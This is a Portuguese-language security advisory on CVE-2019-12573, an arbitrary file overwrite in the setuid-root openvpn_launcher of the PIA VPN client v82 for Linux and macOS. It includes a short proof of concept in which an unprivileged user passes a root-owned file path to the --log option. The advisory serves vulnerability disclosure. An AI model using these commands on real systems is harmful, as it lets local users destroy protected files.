For the English version of this alert, click here.
Allele Security Alert
ASA-2019-00379
Identificador(es)
ASA-2019-00379, CVE-2019-12573
Título
Sobrescrita de arquivo arbitrário
Fabricante(s)
London Trust Media, Inc
Produto(s)
Private Internet Access (PIA) VPN Client
Versão(ões) afetada(s)
Private Internet Access (PIA) VPN Client para Linux e macOS versão v82
Versão(ões) corrigida(s)
Private Internet Access (PIA) VPN Client para Linux e macOS versão v1.2.1 ou posterior
Prova de conceito
Sim
Descrição
Uma vulnerabilidade no Private Internet Access (PIA) VPN Client para Linux e macOS versão v82 pode permitir que um atacante local autenticado substitua arquivos arbitrários.
Detalhes técnicos
O binário PIA Linux e macOS openvpn_launcher é root setuid. Este binário suporta a opção –log que aceita um caminho como um argumento. O parâmetro –log não é higienizado, o que permite que um local não privilegiado substitua arquivos arbitrários pertencentes a qualquer usuário no sistema, incluindo root. Isso cria uma condição de negação de serviço e possível perda de dados se aproveitada por um usuário local mal-intencionado.
Passos para reproduzir
Etapa 1 – Crie um arquivo de teste de propriedade de root. Para este PoC /etc/test.txt é usado.
# Como root echo "this is a test" > /etc/test.txt chmod 600 /etc/test.txt
Etapa 2 – Sobrescreva o arquivo usando a opção –log usando um usuário não privilegiado.
# macOS /Applications/Private\Internet\Access.app/Contents/Resources/openvpn_launcher --log /etc/test.txt
# Linux /opt/pia/openvpn_launcher.64 --log /etc/test.txt
Etapa 3 – Verificar se o conteúdo do arquivo foi sobrescrito
# As root cat /etc/test.txt
Créditos
Rich Mirch
Referência(s)
PIA Linux, macOS Arbitrary File Overwrite
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12573.txt
CVE-2019-12573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12573
CVE-2019-12573
https://nvd.nist.gov/vuln/detail/CVE-2019-12573
Se encontrou algum erro neste alerta ou deseja uma análise compreensiva, entre em contato.
Última modificação: 26 junho 2019